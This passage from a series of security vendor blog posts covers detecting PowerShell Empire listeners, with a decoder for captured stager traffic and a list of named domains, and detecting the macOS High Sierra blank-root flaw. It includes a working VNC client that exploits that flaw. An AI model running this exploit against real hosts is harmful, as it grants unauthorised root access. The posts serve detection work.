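    "Server: Microsoft-IIS/7.5\r\n"
    "Date: Fri, 17 Nov 2017 14:24:19 GMT\r\n"
    "\r\n" + EMPIRE_DEFAULT_PAGE
)
# A generic server that happens to send a 233-byte 404 but also a Connection header.
NOT_EMPIRE_404 = (
    "HTTP/1.1 404 Not Found\r\n"
    "Server: Apache\r\n"
    "Content-Length: 233\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>not found</body></html>"
)

if __name__ == "__main__":
    print("Shodan-style fingerprint:", matches_404_fingerprint(EMPIRE_ROOT_404))
    print("confirmed Empire listener:", is_empire_listener(EMPIRE_ROOT_404, EMPIRE_INDEX_200))
```

To use it against a live host, fetch "/" and some random path with a plain HTTP client and pass the raw responses in; the functions deliberately check the Content-Length header rather than the body length, exactly as the Shodan filter does, so a reverse proxy that rewrites the body will fall outside the fingerprint just as it would on Shodan.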
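The tail of the captured stager above is a plain RC4 unwrap: the $R scriptblock is RC4, the first four bytes of the downloaded data are an IV, the RC4 key is that IV followed by the ASCII staging key in $K, and the decrypted bytes are handed to IEX. The following Python reimplements that unwrap so a captured second-stage response can be decoded offline. It is an added example written for this page, not Empire's code; the staging key is the one visible in the stager above, and the blob decoded in the test is constructed here (no real stage was available).

```python
import os

# Staging key visible in the captured stager above ($K); Empire staging keys are 32 ASCII characters.
STAGING_KEY = "9bd4b7087332164f0bd38400f1485f6f"


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 exactly as the stager's $R scriptblock does it: key schedule, then keystream XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # KSA: the 0..255 loop in $R
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # PRGA: the $D|%{...} loop in $R
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def unwrap_stage(blob: bytes, staging_key: str = STAGING_KEY) -> str:
    """Mirror the stager's last line: $Iv is the first 4 bytes, the RC4 key is $IV + $K,
    and -join [char[]] maps each byte to one character (Latin-1) before IEX."""
    iv, body = blob[:4], blob[4:]
    return rc4(iv + staging_key.encode("ascii"), body).decode("latin-1")


def wrap_stage(script: str, staging_key: str = STAGING_KEY, iv: bytes = None) -> bytes:
    """Inverse of unwrap_stage (RC4 is symmetric); used here only to construct a test blob."""
    iv = iv if iv is not None else os.urandom(4)
    return iv + rc4(iv + staging_key.encode("ascii"), script.encode("latin-1"))


if __name__ == "__main__":
    # Constructed round trip standing in for a captured /admin/get.php response.
    captured = wrap_stage("Write-Host 'second stage goes here'")
    print(unwrap_stage(captured))
```

With a real capture, feed unwrap_stage() the raw bytes of the GET response for $ser+$t together with the staging key lifted from the stager; a wrong key yields Latin-1 noise rather than PowerShell, which is a quick way to tell whether the stager and the captured stage belong together.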
Finally, I found SSL usage in conjunction with Empire to be fairly interesting. I counted 47 self-signed certificates among the discovered servers. More intriguing to me is the number of certificates issued by Let's Encrypt. It's been Let's Encrypt's long-standing policy not to police content, and I'm certainly not going to argue against that, especially since I don't have sufficient information to determine whether any of the servers are actually malicious. As such, I'm just going to present the data without further comment. I've broken the domains up into two groups: domains verified to have Empire HTTP listeners, and servers that were unreachable.

Verified Empire HTTP Listeners:
    power-shell.net
    companysurveys.com
    prohockeynews.org
    changeme.mefound.com
    web02.allcleardata.com
    nvwmi64.nt

Unreachable:
    driverupdatesystem.com
    mswordupdates.com
    windowstechinfo.co.uk
    40xpr0.cdn-microsoft.com
    cdn.cloudfiare.ch
    creditscore.crownfinancialconcepts.org
    www3.akuncapital.com
    firstbankcardservices.com
    www1.hudsontalentagency.com
    c2.ippsaonline.com
    www.sharedmz.com
    sogood.24hr.com
    aldreboende.net
    sso.dhow.xyz
    streaming.threenow.online
    catalog.precisionpartiesebook.com

CONCLUSION

Little mistakes add up, not just for the blue team but for the red team, too. Take advantage of your adversaries' mistakes when you can. In this case, you can use plugin 99592 to help find any Empire HTTP listeners in your environment.

THE BAD, THE UGLY AND THE CYBER IMMORAL - THANK YOU, UBER
November 28, 2017, 9:43 am

Technology, business and morality are not mutually exclusive, but rather fundamentally intertwined into the fabric of how our society operates and will have to increasingly operate in the future.
As information about us is leveraged at the very core of modern economies, users have every right to expect a reasonable standard of care when it comes to keeping their personal information secure. And companies have a legal requirement to do just that. Security is far from perfect and we all acknowledge that breaches may still occur. The Uber breach and subsequent cover-up displayed not only a disregard for the law, but more fundamentally a disdain for their customers and for basic moral responsibility. Uber not only failed to protect the information they were collecting about their customers -- thus causing them potential harm -- they chose to cover up the breach and subject those individuals to further risk by not meeting their notification responsibilities. There are already a number of class action lawsuits against Uber, alleging the company was negligent in protecting consumer data. That sounds about right.

A digital society and economy require the establishment of a reasonable standard of care that ensures basic cyber hygiene practices are maintained by all organizations. While corporations may have resisted such a concept in the past, the inevitability of cyber attack and the possibility of breaches now has responsible boards of directors and corporate leaders looking for such clarity and guidance. All parties are finally saying "enough is enough." Maybe that means some good change is around the corner.

TENABLE DELIVERS INDUSTRIAL SECURITY
November 29, 2017, 6:39 am

Cyber-Physical Security is a Growing Problem

Organizations are continuously leveraging new data and information capabilities to accelerate their business processes and deliver greater value to customers.
As a result, industries such as energy, utilities and manufacturing are becoming increasingly digital and connected. But with new technology come new challenges. As physical operations systems, such as industrial control systems (ICS) and supervisory control and data acquisition (SCADA) devices, connect to information networks – often labeled the IT/OT convergence – business leaders must consider the added risk to their production environments. These systems play a pivotal role in our national, economic and public safety. Unfortunately, ICS/SCADA systems were not designed with security in mind. Recently, threats targeting these critical environments have gained increased recognition with headline-grabbing news such as Stuxnet and Industroyer/CrashOverride. US-CERT released an advisory citing analysis by the Department of Homeland Security (DHS) and the FBI detailing ongoing efforts by malicious actors targeting U.S. critical infrastructure. With increased connectivity, organizations can no longer rely on air gaps, and security through obscurity is no longer justifiable. Recently, critical infrastructure has become collateral damage in widespread incidents such as WannaCry and Petya/NotPetya. While these attacks did not specifically target ICS/SCADA systems, they caused significant downtime and revenue loss for a number of organizations.

INDUSTRIAL SECURITY FROM TENABLE

The growing threats targeting critical infrastructure and the rapid convergence of IT with OT are what led Tenable to research and develop our latest product, Industrial Security. With this launch, we're doubling down on our commitment to empower organizations to understand and reduce cyber risk across the modern attack surface, including ICS/SCADA. Industrial Security is designed to help cross-functional teams of information security and operations engineers understand their cyber risk and protect operational performance.
By leveraging the non-intrusive, passive capabilities of Nessus Network Monitor, Industrial Security includes new ICS/SCADA capabilities for asset discovery and vulnerability detection on critical infrastructure, which requires a non-intrusive approach to vulnerability management. Nessus Network Monitor provides continuous asset discovery, passive vulnerability detection, and multi-segment management.

IT'S BETTER TOGETHER - TENABLE AND SIEMENS

Recognizing that OT security is a complex issue that is impossible to solve by a single vendor, Industrial Security is backed by a strategic partnership with Siemens. Together, we have combined proven vulnerability management from Tenable with Siemens' domain expertise. Historically, IT solutions have not been able to solve OT problems because IT vendors did not understand the core goals and priorities of operational engineers. Leveraging the successful history and deep knowledge of Siemens, Industrial Security was purpose-built for OT environments. Siemens brings decades of industrial expertise. Through its dedicated cybersecurity service, Siemens serves as an integrator helping customers secure their OT environments. This groundbreaking partnership gives energy and utility companies safe and continuous visibility into their production networks. Powered by Siemens, Industrial Security helps companies clearly visualize their OT attack surface and manage it more confidently by drawing on Siemens' domain expertise. Siemens helps customers translate insights into action by understanding the operational implications of security information, while prioritizing critical risks to better protect assets.
DETECTING MACOS HIGH SIERRA ROOT ACCOUNT VULNERABILITY (CVE-2017-13872)
November 29, 2017, 1:14 pm

On November 28, 2017 a software developer (Lemi Orhan Ergin) reported a critical flaw in macOS High Sierra which allows any local user to log in as root without a password after multiple attempts. The vulnerability was originally thought to be exploitable only with physical access to the computer, but our researchers have been able to exploit it to elevate privileges over an authenticated Secure Shell (SSH) session from a lower-privileged account, and remotely using Virtual Network Computing (VNC) if screen sharing is enabled.

UNDERSTANDING THE ROOT CAUSE

Patrick Wardle provides a very in-depth discussion of the root cause (no pun intended) of the issue. When a person (authorized or unauthorized) tries to log in to a macOS High Sierra system with an account that is disabled (i.e. root), the disabled account is enabled and its password is set to whatever was supplied. Even if the supplied password is empty, the account ends up enabled with a blank password. Whether the attempt is made at the keyboard, over VNC, or over an authenticated SSH session, the account is enabled on the first attempt, and the second attempt then logs in. If you are a home user and have not enabled SSH or VNC, then you are not at risk from remote attacks. For corporate environments, this vulnerability is a very real problem, as most management tools use remote access like SSH and VNC. Many management systems, like Nessus® and Tenable.io™, use SSH to perform management operations. Therefore, organizations that have users with macOS High Sierra computers are at extreme risk from this vulnerability.
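Because the bug is confirmed by triggering it, any direct check leaves root enabled on a vulnerable host. The following Python is an added, read-only triage check written for this page (it is not one of Tenable's plugins): it reads /Library/Receipts/InstallHistory.plist for Security Update 2017-001, the product version from sw_vers, and the root record's AuthenticationAuthority from dscl, and changes nothing. Assumptions: the ";DisabledUser;" token in that attribute is what marks root as disabled (it disappears once root has been enabled, by this bug or by dsenableroot), and 10.13.2 is the first macOS release shipping the fix. The sample plist and dscl output used offline are constructed.

```python
import plistlib
import subprocess
import sys

PATCH_NAME = "Security Update 2017-001"
INSTALL_HISTORY = "/Library/Receipts/InstallHistory.plist"
FIXED_IN = (10, 13, 2)          # assumption: 10.13.2 ships the fix for CVE-2017-13872


def security_update_installed(install_history: bytes, name: str = PATCH_NAME) -> bool:
    """InstallHistory.plist is an array of dicts; displayName names each installed package."""
    return any(entry.get("displayName") == name for entry in plistlib.loads(install_history))


def root_account_enabled(auth_authority: str) -> bool:
    """Assumption: `dscl . -read /Users/root AuthenticationAuthority` shows ';DisabledUser;'
    while root is disabled; an enabled root has a ShadowHash entry without that token."""
    return "ShadowHash" in auth_authority and "DisabledUser" not in auth_authority


def assess(product_version: str, install_history: bytes, auth_authority: str) -> dict:
    """Combine the three facts into the verdict a scanner would report."""
    version = tuple(int(part) for part in product_version.split("."))
    affected_release = (10, 13) <= version < FIXED_IN      # 10.13.0 and 10.13.1
    patched = security_update_installed(install_history)
    return {
        "vulnerable": affected_release and not patched,
        "root_enabled": root_account_enabled(auth_authority),   # already enabled = already hit?
    }


def assess_local_host() -> dict:
    """Run the three read-only commands on this macOS host."""
    if sys.platform != "darwin":
        raise RuntimeError("run this on macOS")
    version = subprocess.check_output(["sw_vers", "-productVersion"], text=True).strip()
    with open(INSTALL_HISTORY, "rb") as fh:
        history = fh.read()
    auth = subprocess.run(["dscl", ".", "-read", "/Users/root", "AuthenticationAuthority"],
                          capture_output=True, text=True).stdout
    return assess(version, history, auth)


# Constructed sample data for offline use (a patched 10.13.1 host with root still disabled).
SAMPLE_HISTORY = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><array>
<dict><key>displayName</key><string>macOS 10.13.1 Update</string><key>processName</key><string>softwareupdated</string></dict>
<dict><key>displayName</key><string>Security Update 2017-001</string><key>processName</key><string>softwareupdated</string></dict>
</array></plist>"""
SAMPLE_AUTH_DISABLED = "AuthenticationAuthority: ;DisabledUser;;ShadowHash;HASHLIST:<SALTED-SHA512-PBKDF2>\n"
SAMPLE_AUTH_ENABLED = "AuthenticationAuthority: ;ShadowHash;HASHLIST:<SALTED-SHA512-PBKDF2>\n"

if __name__ == "__main__":
    print(assess_local_host() if sys.platform == "darwin"
          else assess("10.13.1", SAMPLE_HISTORY, SAMPLE_AUTH_DISABLED))
```

A "root_enabled": True result on a host that never had root enabled on purpose is worth treating as a sign the bug has already been triggered there, and the account should be disabled again after the patch is applied.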
DETECTING VULNERABLE HOSTS

We are releasing several plugins to detect vulnerable hosts. Plugin #104814 detects whether the patch (Security Update 2017-001) has been applied on the target host. Plugin #104848 tries to confirm the existence of the vulnerability by escalating privileges from a non-admin/non-root user to root. That plugin is only enabled when "safe checks" are disabled, since it changes the system state: on a vulnerable host the check enables the root account with a blank password, which the plugin then disables again. Please review "Advanced Scan Policy Steps" for instructions on enabling this plugin.

* macOS 10.13 root Authentication Bypass (Security Update 2017-001) (104814)
* macOS 10.13 root Authentication Bypass Direct Check (104848)

ADVANCED SCAN POLICY STEPS

When executing the macOS 10.13 root Authentication Bypass Direct Check (104848) plugin, we recommend scanning systems with a non-root account. To set up a scan for this vulnerability, follow these steps:

1. Add a new scan and choose Advanced Scan.
2. Next, add the credentials. Use a regular account and set "Elevate privileges with" to "Nothing." The key to using this plugin is to scan with that same non-root account and authorize no escalation. All the systems you are scanning need to have the same account, which is common for scanning.
3. Next, disable all other plugins, and then enable only plugin 104848 (disable all other plugins, search for the plugin, enable the single plugin).
4. Disable Safe Checks. This setting can be found under "Advanced" in the settings menu.
5. After selecting the plugins, add in the target range and scan your targets.

HOW DOES THE PLUGIN WORK?
Plugin #104848 exploits the privilege escalation vulnerability to verify that the system is vulnerable. The plugin works as follows:

1. Nessus or Tenable.io scans the system with the account you supplied in the advanced policy. Note that this must be a non-root account. After logging in, the scanner attempts to run a command as the root user, authenticating with a blank password. If the host has the root account disabled and is vulnerable, this causes the host to enable the root account and set a blank password, even though the attempted command fails.
2. The scanner attempts to run the command again, and if the host is vulnerable it now succeeds.
3. If root access is granted, the plugin runs a clean-up process that:
   1. Disables the root account
   2. Removes the blank password hash for the root account

WRAPPING UP

We continue to research this vulnerability and investigate different ways to detect it. When we have new information, we will release additional plugins. This vulnerability is a real and present danger to all organizations and should be patched immediately. Apple recently released a patch to resolve this vulnerability. Customers with a tightly controlled patch cycle or change control process should consider asking for an exception for this patch, as leaving systems vulnerable to this privilege escalation unpatched for any period of time could be devastating to your network. Should a malicious user gain access to one of these systems, the attacker could cause all sorts of havoc on the network.

DETECTING MACOS HIGH SIERRA ROOT ACCOUNT WITHOUT AUTHENTICATION
November 30, 2017, 11:40 am
Yesterday, Tenable™ released two plugins to detect macOS High Sierra installs which allow a local user to log in as root without a password after several login attempts. Both plugins require authentication. However, there was one scenario where a user could log in over the VNC protocol with the root account and no password if screen sharing was enabled. Today, we are releasing a plugin to remotely detect the vulnerability without authentication.

CONFIRMING THE VULNERABILITY

One of my colleagues initially reported that exploitation was possible remotely over VNC after trying it against his personal laptop. To confirm the report, I fired up TightVNC (an open source VNC server/client) and tried to exploit the issue on a lab box with "Screen Sharing" enabled (see screenshot below). I ran into a problem where TightVNC couldn't connect to macOS (more on this later). I then tried another VNC client, RealVNC, and was able to successfully exploit the issue. After two attempted logins with root and a blank password, the VNC client drops you to a desktop on the remote host, as root. Now it's time to look into the VNC protocol and figure out how we can write a remote check for this!

DELVING INTO THE VNC PROTOCOL

Any time you want to learn a new protocol, a good place to start is the RFC. The RFC for VNC can be found here: https://tools.ietf.org/html/rfc6143. The RFC refers to the protocol as RFB (remote framebuffer). In order to exploit the vulnerability, we need to figure out how to perform authentication over the VNC protocol. The first step is to connect to the host and receive a banner, which looks something like this:

    RFB protocol version = 3.889

Next, we send a similar banner string to the server (ending in a newline), and receive a response from the server that contains the supported authentication types (response decoded below):

    Server Auth Types: 30,33,36,35

The RFC doesn't mention anything about these authentication types.
I needed to figure out what these were, so I loaded up the debug log for RealVNC and saw the following:

    2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: processing security types message
    2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: Server offers security type Ard(30)
    2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: Server offers security type [unknown secType 33](33)
    2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: Server offers security type [unknown secType 36](36)
    2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: Server offers security type [unknown secType 35](35)

So RealVNC didn't know what any of these types were, other than type 30, which it labels as Ard. A few Google searches later, we found that Ard stands for "Apple Remote Desktop". No wonder TightVNC didn't work, as that application only supports the RFC standard authentication types. To use that type, we send security type 30 (0x1E) to the server and extract the response, which contains the parameters for the authentication. Here is the response in Wireshark (screenshot not reproduced). Looks like Diffie-Hellman! The generator value is always two bytes and comes first in the packet. The key length is next and is a two-byte integer. The prime modulus and public key follow, and each is as long as the key length. So far, the debugging output of the plugin shows this:

    RFB protocol version = 3.889
    Server Auth Types: 30,33,36,35
    Doing apple auth!
    ARD Material:
    Generator : 0002
    Key Length : 128
    Prime Modulus : ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece65381ffffffffffffffff
    Public Key : a1ef2769ecfa51e2913751a3c51e3fabde0732466915fe0f65cf0aa61f468a929850717f4258a9449da3ba92e3a7ab07d12bb503ea34f079c98837c40dce8cfd123c3bf6ffbef49c6ea42abda1a80d317bd001dc6545da46d4697b5b90a26ef5f859983c2c0b4f09d29883344b05da3222ee268460687c2d8544df62cb2f49b5

So, the obvious thing we need to do is generate our own DH key pair and calculate the shared secret. What's next? After a bit more Googling and Wireshark analysis, we learn that the username and password are sent using AES encryption (in ECB mode), with the key being the MD5 hash of the shared secret. The username and password are sent in a 128-byte blob. The first 64 bytes are for the username, the last 64 for the password. The username and password are null-terminated and the remaining space is padded with random bytes. (The original post shows such a blob for username admin, password FooBar12, before encryption; screenshot not reproduced.) To complete the authentication, we send the AES-encrypted blob plus our public DH key, and the server replies with a four-byte integer to indicate success or failure: 0 is success, 1 is failure. Now we can write our remote check!

EXPLOITING THE VULNERABILITY

Exploiting the vulnerability is easy. We try to log in using root and a blank password multiple times (four times max) using the process described above. If we successfully log in, then the remote host is vulnerable.

THE NESSUS® PLUGIN

Plugin 104885 was created to exploit the issue remotely over VNC. You must have "safe checks" disabled in order for this plugin to run.
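The client side of the exchange described above (version banner, security type 30, the server's DH parameters, an AES-128 key derived as MD5 of the shared secret, the 128-byte credential blob in ECB mode, then blob plus client public key, then the four-byte result), together with a simulated server so that both sides can be run against each other offline. This is an added example written for this page, not the Nessus plugin: the generator and prime are the ones in the ARD Material above (the prime is the RFC 2409 1024-bit group), AES is taken from pycryptodome or cryptography (assumed installed only for the encrypting path), and the security-type list is assumed to arrive as a one-byte count followed by the types, as in RFB 3.7 and later.

```python
import hashlib
import os
import secrets
import socket
import struct

SECTYPE_ARD = 30              # "Apple Remote Desktop" security type
ARD_GENERATOR = 2
# 1024-bit modulus from the ARD Material above (the RFC 2409 group 2 prime).
ARD_PRIME = int(
    "ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74"
    "020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f1437"
    "4fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7ed"
    "ee386bfb5a899fa5ae9f24117c4b1fe649286651ece65381ffffffffffffffff", 16)


def aes_ecb_encrypt(key: bytes, data: bytes) -> bytes:
    """AES-ECB from pycryptodome or cryptography (assumption: one of them is installed)."""
    try:
        from Crypto.Cipher import AES
        return AES.new(key, AES.MODE_ECB).encrypt(data)
    except ImportError:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
        return enc.update(data) + enc.finalize()


def server_ard_params(server_priv: int) -> bytes:
    """Simulated server reply to type 30: generator(2) | key length(2) | prime | server public key."""
    klen = (ARD_PRIME.bit_length() + 7) // 8
    server_pub = pow(ARD_GENERATOR, server_priv, ARD_PRIME)
    return (struct.pack(">HH", ARD_GENERATOR, klen)
            + ARD_PRIME.to_bytes(klen, "big") + server_pub.to_bytes(klen, "big"))


def parse_ard_params(msg: bytes):
    """Client side: split that reply into (generator, key length, prime, server public key)."""
    g, klen = struct.unpack(">HH", msg[:4])
    p = int.from_bytes(msg[4:4 + klen], "big")
    server_pub = int.from_bytes(msg[4 + klen:4 + 2 * klen], "big")
    return g, klen, p, server_pub


def session_key(peer_pub: int, own_priv: int, p: int, klen: int) -> bytes:
    """AES-128 key = MD5 of the DH shared secret, encoded big-endian in key-length bytes."""
    return hashlib.md5(pow(peer_pub, own_priv, p).to_bytes(klen, "big")).digest()


def build_credential_blob(username: str, password: str) -> bytes:
    """128 bytes: 64-byte username field then 64-byte password field, NUL-terminated, random padding."""
    def field(value: str) -> bytes:
        raw = value.encode("utf-8") + b"\x00"
        if len(raw) > 64:
            raise ValueError("field longer than 63 bytes")
        return raw + os.urandom(64 - len(raw))
    return field(username) + field(password)


def parse_credential_blob(blob: bytes):
    """What the server does with the decrypted blob."""
    user = blob[:64].split(b"\x00", 1)[0].decode("utf-8")
    password = blob[64:128].split(b"\x00", 1)[0].decode("utf-8")
    return user, password


def client_ard_response(params: bytes, username: str, password: str, client_priv: int = None):
    """Client reply: AES-ECB(blob) || client public key. Returns (reply, session key)."""
    g, klen, p, server_pub = parse_ard_params(params)
    client_priv = client_priv or secrets.randbelow(p - 2) + 1
    client_pub = pow(g, client_priv, p)
    key = session_key(server_pub, client_priv, p, klen)
    blob = aes_ecb_encrypt(key, build_credential_blob(username, password))
    return blob + client_pub.to_bytes(klen, "big"), key


def auth_succeeded(result: bytes) -> bool:
    """Server's final 4-byte big-endian integer: 0 = success, 1 = failure."""
    return struct.unpack(">I", result[:4])[0] == 0


def recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
    return buf


def ard_login(host: str, username: str = "root", password: str = "",
              port: int = 5900, attempts: int = 4) -> bool:
    """Live check: retry root/blank up to `attempts` times on fresh connections, as the plugin does.
    True means the host accepted it, which also means root is now enabled there."""
    for _ in range(attempts):
        with socket.create_connection((host, port), timeout=10) as s:
            banner = recv_exact(s, 12)            # e.g. b"RFB 003.889\n"
            s.sendall(banner)                     # echo the version string back
            types = recv_exact(s, recv_exact(s, 1)[0])
            if SECTYPE_ARD not in types:
                return False
            s.sendall(bytes([SECTYPE_ARD]))
            head = recv_exact(s, 4)
            _, klen = struct.unpack(">HH", head)
            params = head + recv_exact(s, 2 * klen)
            reply, _ = client_ard_response(params, username, password)
            s.sendall(reply)
            if auth_succeeded(recv_exact(s, 4)):
                return True
    return False
```

The offline pieces (server_ard_params, parse_ard_params, session_key and the blob helpers) show that both ends derive the same 16-byte key and that the server can recover "root" and an empty password from the blob; ard_login() is the live version and should only be pointed at hosts you own, because a True result has just enabled root on that host and it must be disabled again.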
Safe checks must be off because successful exploitation will enable the root account, so there is a bit of cleanup involved afterward if you find any affected boxes with the plugin. You need to both disable the root account and patch the underlying vulnerability.

WRAP-UP

Apple has already released a patch for this vulnerability. This is a critical vulnerability by any standard, so please take all necessary steps to patch your systems as soon as possible. If the patch can't be applied for some reason, please disable screen sharing if it's not needed. If it is needed, then enable the root account and set a strong password.

FROM OFF-THE-RACK TO CUSTOM TAILORED?
December 4, 2017, 6:42 am

A Government Perspective on the Changing CDM Landscape

As the Continuous Diagnostics & Mitigation Program (CDM) begins its next phase of task orders, it is useful to look back at the earlier stages of the program to help us understand the importance of changes now being implemented in the program's contractual and programmatic structures. CDM began as a group of GSA Schedule 70 Blanket Purchase Agreements (BPAs), awarded in August 2013 to 17 companies. The first four task order awards were for tools, with choice of vendor based on lowest price for each respective tool. These were followed by Continuous Monitoring as a Service (CMaaS) task order awards, organized into six different government agency groups. To compete for CMaaS task orders, contractors architected solutions that included the tools they selected from the CDM Approved Product List. Upon the award of each CMaaS task order, the winning contractor set about implementing their solution for all agencies in the CDM "Group," regardless of the tools already in place at a particular agency.
For some agencies, this was not a problem because they already had the same tools, and CDM simply provided them with additional product and integration funded by DHS. For others, however, this created a conflict between existing agency IT contracts and architecture and the new CDM solution. In some cases, this conflict led to a slowdown of CDM implementation across the agency. With most task orders having only a three-year period of performance (and some even less), the impact of such slowdowns on implementation was substantial. One major challenge to successful CDM rollout has been simply educating the federal workforce about the value of CDM to their organization. As one front-line IT manager put it, “If people understand that CDM will ultimately improve our quality of service, we’ll get that ownership buy-in we need to make it work.” At Tenable, we have captured these types of insights from CDM CISOs, PMs and other government and private-sector experts in an ebook, CDM From the Frontlines. Please visit to read these perspectives on the program, lessons learned and tips for successful task order performance. Looking ahead to phase three of the CDM program, the government is shifting its approach. The next round of CDM task orders, labeled “Dynamic and Evolving Federal Enterprise Network Defense” (DEFEND), will be structured so as to allow for more flexibility in individual agency solutions. Recognizing that establishing a common cybersecurity platform across the federal government is a basic goal of CDM, the new structure still allows for individual agency-specific tailoring that should enhance CDM acceptance and speed implementation across individual agencies. DEFEND task orders will be awarded under the GSA Alliant contract. Alliant has 57 prime contractors, including 14 of the 17 original CDM BPA holders (and 5 of the 6 CDM BPA task order awardees). 
The DEFEND task orders will be awarded, with all options exercised, for a six-year period of performance – twice that of most BPA task orders. The task orders will be cost-plus-award-fee, providing substantial incentive for strong technical performance, with the product purchases being made on a cost-reimbursable basis. Perhaps most importantly, the DEFEND task order awards will initially be for services only, with a post-award opportunity for government-contractor collaboration that will enable each agency to have substantial and meaningful input into their CDM solution architecture, including product/tool selection. To enable this post-award collaboration, the government is decoupling the tools from the task orders. GSA is standing up a new CDM-specific Special Item Number, or SIN, on GSA Schedule 70, where approved products are available for purchase after task order award. Those products currently on the CDM Approved Products List will be grandfathered into the new SIN, and a continuous review process will be put in place, enabling timely technology refreshment going forward. Under this decoupled approach, the final decisions as to which tools to include in a given agency CDM solution will most likely be made as part of the post-award Request for Service, or RFS, process that will take place between the agency and the task order prime contractor. The agency groups will stay the same under DEFEND as under the BPA – the key difference is the RFS process, which will enable a more tailored approach for each agency within the group. The task order awards under DEFEND will be, for practical purposes, single-award IDIQ contracts, with each agency-specific RFS acting as a task order within the CDM DEFEND task order.
Through the RFS process, an agency will be able to bring its internal cyber teams to the table with the CDM contractor and work out a solution that resolves conflicts between the CDM solution and pre-existing solutions already in place within the agency and its component organizations.

READ "CDM FROM THE FRONTLINES"
Get insights and best practices from industry experts on implementing and supporting CDM.

ANNOUNCING NESSUS PROFESSIONAL V7
December 11, 2017, 9:00 pm

New capabilities give security practitioners, consultants and pen-testers greater flexibility

We're pleased to announce Nessus Professional v7. More than 20,000 organizations today use Nessus Professional and there are more than a million and a half Nessus users worldwide. You, the Nessus community, have made Nessus one of the most important and trusted solutions in the industry. Over nearly 20 years, Nessus has become the gold standard for security practitioners and consultants who want fast and accurate point-in-time scans. Starting with version 7, we are intensifying our focus on performance and accuracy, so you can get the job done even faster and more confidently.

NESSUS V7 – A JOURNEY TO GREATER FLEXIBILITY AND PERFORMANCE

We've decided to focus the development of Nessus to make it the most efficient solution for security practitioners, consultants and pen-testers. As such, during the lifetime of the 7.x release, you'll experience several enhancements to achieve that goal. In the first half of 2018, we're planning to release our new high-performance engine, and we're going to dramatically speed up the installation time. In addition, it will lower the load on the system during scans, enabling you to scan faster and scan more hosts at the same time.
EASILY TRANSFERABLE LICENSE
Starting with 7.0, we're relaxing the licensing check that previously prevented you from using Nessus in certain cloud environments or on a live distribution such as Kali Linux. With v7, the 10-day waiting period to transfer your license has been removed entirely, making it quicker to move your license between computers: you can install and reinstall Nessus without any waiting period. Install it on a USB stick and work from there. Install it in your cloud and stop worrying about being "locked out" because the MAC address of the system changed after a reboot. We're thrilled to make this change because it will let you use Nessus in more flexible and creative ways.

REPORTING ENHANCEMENTS
There are also some great enhancements to Nessus Professional reports. With v7, you can add a custom name and/or logo to reports, and have reports emailed automatically upon scan completion. The name/logo customization is particularly valuable for consultants and others who want to personalize Nessus reports, and automated emailing saves time and makes it easier to share results with those who need the information quickly.

NESSUS REIGNS SUPREME
The foundation is as powerful as ever.
Nessus – which also powers Tenable.io and SecurityCenter – is the world's most trusted vulnerability assessment technology for security practitioners and consultants because of its:
* High-speed, accurate scanning with low false positives
* Complete vulnerability scanning for one low cost
* Support for more technologies and coverage of more vulnerabilities than competitive solutions
* Unlimited entitlement for IP addresses and scans – scan as many IPs and run as many assessments as you want
* Ability to correlate scan data with popular pen-testing tools such as Metasploit, Core Impact, Canvas and ExploitHub

GET MORE INFORMATION
* If you're a current user and want to learn more about Nessus Professional v7, including a message from Nessus creator Renaud Deraison, visit "What's New In Nessus Professional v7"
* Learn more about Nessus features, benefits and resources, including the latest plugins
* Start a free 7-day trial of Nessus Professional

JOIN THE CONVERSATION – ONLINE OR IN PERSON
We've launched a new Tenable Community. Join the Nessus Professional group for Nessus Professional v7 announcements and conversation! There's much more in store for Nessus in 2018 – join the community to stay in the loop! Have a happy holiday period, and we hope to see you in the new year at our inaugural user conference, Edge, March 6-9, 2018 in Los Angeles!

A CLARIFICATION ABOUT NESSUS PROFESSIONAL
December 13, 2017, 8:08 am

To our valued Nessus community,

We recently launched a new Tenable Community platform to provide better customer interaction, between customers and with us at Tenable. The new platform combines both the Community and Support in a single location to provide you with a more seamless experience.
